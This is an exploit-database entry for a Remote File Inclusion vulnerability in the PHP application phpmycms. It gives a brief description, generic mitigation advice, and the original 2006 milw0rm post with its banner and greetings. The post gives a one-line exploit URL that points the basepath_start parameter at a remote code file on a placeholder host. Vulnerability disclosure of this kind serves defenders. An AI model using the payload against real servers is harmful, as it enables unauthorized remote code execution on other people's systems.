phpmycms (RFI)

vendor:

phpmycms

by:

v1per-haCker

7,5

CVSS

HIGH

Remote File Inclusion (RFI)

CWE

Product Name: phpmycms

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

A Remote File Inclusion (RFI) vulnerability exists in phpmycms, which allows an attacker to include a remote file, usually through a malicious URL, containing arbitrary code. This code is then executed on the vulnerable server.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in web requests. Also, ensure that web applications are kept up to date with the latest security patches.

Source

Exploit-DB raw data:

#########################################################################################
###################################v1per-haCker##########################################
######################How I Can lives Without FooL Programmer!###########################
#########################################################################################
#=======================================================================================#
#___________________________________phpmycms (RFI)______________________________________#
#=======================================================================================#
# Information:-										#
#											#
# Scripts: phpmycms									#
# download : http://sourceforge.net/projects/phpmycms/					#
# Version : -										#
# Dork & vuln : download script and think :)						#
#											#
#=======================================================================================#
# Exploit :										#
#											#
#http://localhost/path/basic.inc.php?basepath_start=http://EvElCoDe.txt?		#
#											#
#=======================================================================================#
# Discoverd By : v1per-haCker								#
#											#
# Conatact : v1per-hacker[at]hotmail.com						#
#											#
# XP10_hackEr Team		>>	www.xp10.com					#
# SpeciaL PoweR SecuritY TeaM	>>	www.specialpower.org				#
#											#
# Greetz to :	| abu_shahad | RooT-shilL | hitler_jeddah | BooB11 | FaTaL  | 		#
#		| ThE-WoLf-KsA | mohandko | fooooz | maVen | ShikAa | K3BAB |		#
#		| metoovet | MooB | Dr.7zN | ToOoFA | Cold Zero | Afroota   |		#
#		| MainstreaM | CoDeR | Simo-64 | Super-CrystaL | KoolholiO  | 		#
#		|  MuhaciR  |Skrmhcr-GVinux | Jean | fucker_net | Sir-ToTTi |		#
#	    										#
# Thanks >>	/str0ke	& www.milw0rm.com & www.google.com				#
#=======================================================================================#
#########################################################################################
#################################L0ve is L1fe W0und3r####################################
#########################################################################################


# milw0rm.com [2006-12-13]